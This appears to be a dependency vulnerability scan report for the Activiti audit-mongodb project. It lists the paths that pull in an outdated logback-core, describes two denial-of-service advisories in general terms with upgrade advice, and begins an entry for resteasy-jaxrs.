Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
Overview
ch.qos.logback:logback-core is a logback-core module.
Affected versions of this package are vulnerable to Denial of Service (DoS). An attacker can mount a denial-of-service attack by sending poisoned data. This is only exploitable if logback receiver component is deployed.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade ch.qos.logback:logback-core to version 1.2.13, 1.3.12, 1.4.12 or higher.
References
high severity
- Vulnerable module: ch.qos.logback:logback-core
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-logging@7-201802-EA › net.logstash.logback:logstash-logback-encoder@4.11 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-jetty@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-security@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter-mongodb@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-monitoring@7-201802-EA › org.springframework.boot:spring-boot-starter-actuator@4.0.1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-tracing@7-201802-EA › org.springframework.cloud:spring-cloud-starter-sleuth@3.1.11 › org.springframework.boot:spring-boot-starter-aop@4.0.0-M2 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.springframework.boot:spring-boot-starter-web@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-data-rest@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.boot:spring-boot-starter-hateoas@4.0.1 › org.springframework.boot:spring-boot-starter-webmvc@4.0.1 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.cloud:spring-cloud-starter@5.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-starter-loadbalancer@5.0.0 › org.springframework.boot:spring-boot-starter-cache@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-amqp@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-jackson@4.0.1 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.cloud:spring-cloud-stream@5.0.0 › org.springframework.boot:spring-boot-starter-validation@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-stream-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit@5.0.0 › org.springframework.cloud:spring-cloud-stream-binder-rabbit-core@5.0.0 › org.springframework.boot:spring-boot-starter-webflux@4.0.0 › org.springframework.boot:spring-boot-starter-reactor-netty@4.0.0 › org.springframework.boot:spring-boot-starter@4.0.1 › org.springframework.boot:spring-boot-starter-logging@4.0.1 › ch.qos.logback:logback-classic@1.5.22 › ch.qos.logback:logback-core@1.2.3
Overview
ch.qos.logback:logback-core is a logback-core module.
Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') via the logback receiver component. An attacker can mount a denial-of-service attack by sending poisoned data.
Note:
Successful exploitation requires the logback-receiver component being enabled and also reachable by the attacker.
Remediation
Upgrade ch.qos.logback:logback-core to version 1.2.13, 1.3.14, 1.4.14 or higher.
References
high severity
- Vulnerable module: org.jboss.resteasy:resteasy-jaxrs
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-identity-keycloak@7-201802-EA › org.jboss.resteasy:resteasy-client@3.0.21.Final › org.jboss.resteasy:resteasy-jaxrs@3.0.21.Final
-
